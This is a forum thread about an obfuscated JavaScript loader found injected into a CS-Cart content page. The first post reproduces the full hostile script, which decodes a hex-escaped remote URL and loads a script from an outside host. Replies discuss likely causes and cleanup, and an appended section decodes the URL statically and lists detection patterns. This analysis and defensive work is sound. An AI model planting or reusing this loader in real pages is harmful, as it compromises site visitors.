Javascript Injected Into A Content Page In Database?

We have numerous CS-Cart sites for our clients, and today one of them got this beauty placed into the HTML code for one of the content pages.

```
<script type="text/javascript">// <![CDATA[
document.write('<' + 'script type="text/javascript" language="javascript" id="47x1dlm1so"></' + 'script>');
var j = document.getElementById("47x1dlm1so");
var s =;
var s1 = ""; var qcl2q = 10;
for (var i = 0; i < s.length; i++) { var r8j8tnwtk76gj = s.charCodeAt(i) + qcl2q; r8j8tnwtk76gj = 65 + (r8j8tnwtk76gj % 57); s1 += String.fromCharCode(r8j8tnwtk76gj); qcl2q = s.charCodeAt(i);}
s1 = s1.replace(/[^a-zA-Z0-9]/g, "");
if( document.cookie.indexOf("google_api=1;") == -1 ) {j.src = "\x68\x74t\x70\x3a\x2f\x2f"+s1+".\x70e\x67\x75a\x72\x64s\x2ec\x63/\x62\x38c\x37\x66\x38f\x33\x69\x71\x2f\x67et\x2e\x6a\x73";}
delete s; delete s1;
// ]]></script>
```

Does anyone else know of this kind of activity occurring? And any reasons as to why it might have?

It's a Windows server using CS-Cart 2.2.4

I don't really know this exact problem, but I had a problem with WordPress and this happening. Basically the client didn't keep up on his WordPress updates and there was a hack. This hack not only affected his WordPress site, but also changed a ton of files on his CS-Cart site. It was a huge pain in the neck to clean up and fix, but we ended up getting it.

Obviously anything is possible, but if you have a blog installed where your CS-Cart is installed, I'd look there first.

I hope that helps.


brandonvd wrote:

> Obviously anything is possible, but if you have a blog installed where your CS-Cart is installed, I'd look there first.


And change all server passwords (i.e. for server access, ftp, mysql credentials, control panel logins, etc) immediately.

And don't make all the directories 777 and files 666 like the knowledge base wants you to. Huge security risk.

Having your server (Apache, FTP and PHP) set up correctly can eliminate many of the common security holes that are attacked.

Change passwords frequently for FTP and the cPanel account.

Nah, you can decompile the code. It's a hack in Joomla/WordPress, anything you want; some developers write these hacks into plugins, addons etc. and put them on the market for free… then they put a command and conquer bot on your server and can actually worm themselves anywhere.

You need to find all sources of it. This one pulls a JS from a site, as seen on DDecode - Hex,Octal,HTML Decoder

Best bet is having host run any CMS in own VPS but hey you get what you pay for, if you need a TRUE server contact me, you can have any distro you need and you are alone on the server
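
The hex-escaped `j.src` string in the script from the first post can be read without running it. The following is an added example, not part of any post in this thread: it decodes the `\xNN` escapes statically, defangs the result, and flags this sample's traits in stored page content. The function names and the indicator patterns are assumptions derived from this one sample.

```javascript
// Added example: static triage only. SAMPLE is inert text; it is never evaluated or fetched.
// SAMPLE holds three lines copied from the injected script in the first post.
const SAMPLE = String.raw`document.write('<' + 'script type="text/javascript" language="javascript" id="47x1dlm1so"></' + 'script>');
for (var i = 0; i < s.length; i++) { var r8j8tnwtk76gj = s.charCodeAt(i) + qcl2q; r8j8tnwtk76gj = 65 + (r8j8tnwtk76gj % 57); s1 += String.fromCharCode(r8j8tnwtk76gj); qcl2q = s.charCodeAt(i);}
if( document.cookie.indexOf("google_api=1;") == -1 ) {j.src = "\x68\x74t\x70\x3a\x2f\x2f"+s1+".\x70e\x67\x75a\x72\x64s\x2ec\x63/\x62\x38c\x37\x66\x38f\x33\x69\x71\x2f\x67et\x2e\x6a\x73";}`;

// Decode \xNN escapes from a string-literal body without eval.
function decodeHexEscapes(body) {
  return body.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Walk the expression assigned to .src: decode string literals, keep variables as <name>.
function recoverSrcTemplate(js) {
  const start = /\.src\s*=\s*/.exec(js);
  if (!start) return null;
  const token = /\s*(?:"((?:[^"\\]|\\.)*)"|([A-Za-z_$][\w$]*))\s*(\+?)/y;
  token.lastIndex = start.index + start[0].length;
  let out = '';
  let m;
  while ((m = token.exec(js)) !== null) {
    out += m[1] !== undefined ? decodeHexEscapes(m[1]) : `<${m[2]}>`;
    if (m[3] !== '+') break; // no further concatenation
  }
  return out;
}

// Defang so the result can be pasted into tickets without becoming a live link.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Heuristic patterns (assumed, based on this sample) for scanning stored page content.
// cookieGate alone is common in legitimate code; treat several hits together as the signal.
const INDICATORS = {
  splitScriptTag: /document\.write\(\s*['"]<['"]\s*\+\s*['"]script/i,
  hexEscapedSrc: /\.src\s*=\s*"(?:[^"\\]|\\.)*\\x[0-9a-f]{2}/i,
  charCodeLoop: /charCodeAt\([^)]*\)[\s\S]{0,200}String\.fromCharCode/,
  cookieGate: /document\.cookie\.indexOf\(/,
};

// Return the names of the indicators that match one content field.
function injectionIndicators(content) {
  return Object.keys(INDICATORS).filter((name) => INDICATORS[name].test(content));
}

console.log(defang(recoverSrcTemplate(SAMPLE)), injectionIndicators(SAMPLE));
```

The `<s1>` placeholder marks the subdomain the script computes at run time from the string `s`, whose value is not shown in the post.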